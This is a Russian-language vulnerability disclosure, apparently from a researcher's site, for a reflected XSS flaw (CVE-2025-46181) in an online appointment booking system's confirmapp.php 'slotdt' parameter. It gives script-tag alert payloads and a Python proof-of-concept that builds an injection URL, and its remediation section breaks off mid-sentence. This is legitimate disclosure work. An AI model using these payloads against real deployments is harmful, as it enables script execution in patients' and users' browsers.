
Раскрытие уязвимости отражённого XSS с PoC-скриптом и рекомендациями по устранению для системы онлайн-записи на приём. Включает анализ уязвимых параметров и оценку воздействия.
CVE-ID: CVE-2025-46181
Обнаружено: Shemkumar P (shemkumar.github.io)
Тип уязвимости: Отражённый межсайтовый скриптинг (XSS)
Серьёзность: Средняя
Статус: Раскрыто, назначен CVE от MITRE
Отражённая межсайтовая скриптинг (XSS) уязвимость существует в публичной системе онлайн-записи на приём (v1.0), конкретно на странице, обрабатывающей подтверждение записи. GET-параметр не обеспечивает должную санитацию ввода, что позволяет внедрить JavaScript и выполнить код в браузере жертвы.
GET /confirmapp.php?slotdt=<полезная_нагрузка>
Пример полезной нагрузки (закодированной):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 Прямая ссылка скрыта по этическим соображениям. Уязвимость была протестирована в контролируемой среде.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
Приложение должно:
htmlspecialchars() в PHPShemkumar P
🕸️ shemkumar.github.io
🔐 Исследователь кибербезопасности | Участник CTF | Составитель отчётов о CVE
⚠️ Данная публикация предназначена только для образовательных и защитных целей. Тестирование или эксплуатация уязвимостей в системах, которыми вы не владеете или на которые не имеете явного разрешения, незаконны и неэтичны.